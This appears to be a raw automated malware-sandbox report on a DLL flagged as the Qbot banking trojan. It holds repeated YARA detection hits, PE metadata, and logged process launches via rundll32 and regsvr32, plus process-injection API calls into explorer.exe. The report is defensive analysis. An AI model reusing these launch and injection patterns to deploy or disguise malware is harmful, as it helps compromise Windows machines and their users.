          Source: 22.2.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0.2.loaddll32.exe.a20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0.2.loaddll32.exe.a20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D518A580_2_6D518A58
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D505A340_2_6D505A34
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D51755D0_2_6D51755D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5195450_2_6D519545
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5031620_2_6D503162
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50391B0_2_6D50391B
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5169D90_2_6D5169D9
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5179920_2_6D517992
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5061B50_2_6D5061B5
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D501C6E0_2_6D501C6E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5198230_2_6D519823
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D519CD20_2_6D519CD2
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D515CA60_2_6D515CA6
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5163990_2_6D516399
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D504A200_2_6D504A20
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5116E20_2_6D5116E2
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D502E9F0_2_6D502E9F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027B360B2_2_027B360B
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027B2A062_2_027B2A06
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027B82C02_2_027B82C0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027B63D02_2_027B63D0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027B678F2_2_027B678F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D518A582_2_6D518A58
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D51755D2_2_6D51755D
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5195452_2_6D519545
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5031622_2_6D503162
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D50391B2_2_6D50391B
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5169D92_2_6D5169D9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5179922_2_6D517992
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5061B52_2_6D5061B5
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D501C6E2_2_6D501C6E
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5198232_2_6D519823
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D519CD22_2_6D519CD2
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D515CA62_2_6D515CA6
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5163992_2_6D516399
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D505A342_2_6D505A34
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D504A202_2_6D504A20
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5116E22_2_6D5116E2
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D502E9F2_2_6D502E9F
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027ADA5C GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,2_2_027ADA5C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027AD54A NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,2_2_027AD54A
          Source: _Rsr.dll.22.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: _Rsr.dll.22.drStatic PE information: Data appended to the last section found
          Source: _Rsr.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\_Rsr.dll"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\_Rsr.dll
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GDyZ
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GHQvB58h2E
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\_Rsr.dllJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,DllRegisterServerJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GDyZJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GHQvB58h2EJump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
